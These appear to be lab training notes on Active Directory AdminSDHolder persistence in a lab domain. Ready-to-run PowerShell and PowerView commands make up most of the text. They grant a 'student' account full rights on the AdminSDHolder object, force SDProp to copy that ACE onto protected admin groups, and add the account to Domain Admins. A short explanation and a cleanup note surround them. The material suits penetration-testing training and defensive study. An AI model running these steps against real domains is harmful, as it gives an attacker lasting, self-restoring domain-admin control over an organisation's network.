AdminSDHolder persistence modifies the ACL template applied to protected administrative objects. SDProp periodically copies the AdminSDHolder security descriptor to protected users and groups, so an ACE placed there can reappear on Domain Admins, Enterprise Admins, and other protected objects.
Protected object check
Get-ADUser -LDAPFilter "(adminCount=1)" -Properties adminCount | Select-Object SamAccountName,adminCount
Get-ADGroup -LDAPFilter "(adminCount=1)" -Properties adminCount | Select-Object SamAccountName,adminCount
Review AdminSDHolder ACL
Get-ACL "AD:\CN=AdminSDHolder,CN=System,DC=ootw,DC=local" |
Select-Object -ExpandProperty Access |
Select-Object IdentityReference,ActiveDirectoryRights,ObjectType,IsInherited
Add persistence ACE with PowerView
Import-Module .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=ootw,DC=local" -PrincipalIdentity student -Rights All -Verbose
Trigger SDProp (Invoke-SDPropagator)
Invoke-SDPropagator -TimeoutMinutes 1 -ShowProgress -Verbose
Validate on protected group
Get-ACL "AD:\CN=Domain Admins,CN=Users,DC=ootw,DC=local" |
Select-Object -ExpandProperty Access |
Where-Object {$_.IdentityReference -match "student"}
Abuse the propagated rights
Add-DomainGroupMember -Identity "Domain Admins" -Members student -Verbose
Notes
- AdminSDHolder is not a normal one-object ACL change.
- It is a template that can reapply attacker rights to protected admin objects.
- Cleanup must fix AdminSDHolder and the protected objects that already received the ACE.